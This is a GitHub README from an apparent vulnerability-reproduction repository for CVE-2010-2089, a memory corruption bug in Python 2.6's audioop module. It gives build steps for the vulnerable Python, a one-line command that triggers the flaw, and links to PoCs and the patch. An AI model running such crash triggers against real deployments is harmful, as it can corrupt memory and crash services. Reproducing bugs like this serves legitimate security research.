Skip to content
Branch: master
Find file History
Pull request Compare This branch is 1 commit ahead, 3 commits behind mudongliang:master.
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
Type Name Latest commit message Commit time
..
Failed to load latest commit information.
README.md

README.md

CVE-2010-2089

Experiment Environment

Ubuntu 10.04

INSTALL & Configuration

wget https://github.com/mudongliang/source-packages/raw/master/CVE-2010-2089/Python-2.6.tgz
tar -xvf Python-2.6.tgz
cd Python-2.6
./configure
make

Problems in Installation & Configuration

How to trigger vulnerability

./python -c "import audioop; audioop.reverse('X', 2)"

PoCs

Python 3.2 - 'audioop' Module Memory Corruption

Python 'audioop' Module Memory Corruption Vulnerability

audioop: check that length is a multiple of the size

Vulnerability Details & Patch

Root Cause

Stack Trace

Patch

https://bugzilla.redhat.com/attachment.cgi?id=418359

References

Redhat Bugzilla #598197

You can’t perform that action at this time.